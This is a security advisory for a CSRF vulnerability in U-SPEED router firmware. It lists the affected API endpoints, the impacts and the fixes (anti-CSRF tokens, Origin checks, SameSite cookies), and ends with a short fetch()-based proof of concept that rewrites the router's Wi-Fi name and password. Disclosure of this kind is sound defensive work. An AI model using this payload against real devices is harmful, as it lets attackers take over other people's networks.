# CVE-2026-36960: Cross-Site Request Forgery (CSRF) Vulnerability in Web Management Interface ## Vulnerability Overview * **CVE ID**: CVE-2026-36960 * **CVSS Score**: 8.8 (High) * **Description**: The management API endpoints of U-SPEED Router Firmware V1.0.0 do not implement CSRF protection mechanisms (such as anti-CSRF tokens or strict Origin/Referer validation). An attacker can craft a malicious webpage to lure an authenticated administrator into visiting it, thereby sending forged HTTP requests to perform administrative actions. ## Impact Scope * **Affected Product**: U-SPEED Router Firmware V1.0.0 * **Affected Endpoints**: * `/api/setWlan` (Wireless network configuration) * `/api/telnet` (Telnet service configuration) * Other configuration endpoints (various management functions) * **Potential Impact**: * Unauthorized modification of router configuration * WiFi network takeover * Telnet service manipulation * Denial of service for legitimate users ## Remediation * Implement anti-CSRF tokens on all state-changing endpoints. * Enforce strict Origin and Referer header validation. * Use the `SameSite=Strict` cookie attribute. ## Proof-of-Concept Code (POC) ```html fetch('http://192.168.10.1/api/setWlan', { method: 'POST', credentials: 'include', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify({ ssid: "Hacked_Network", password: "Attacker123" }) }); ```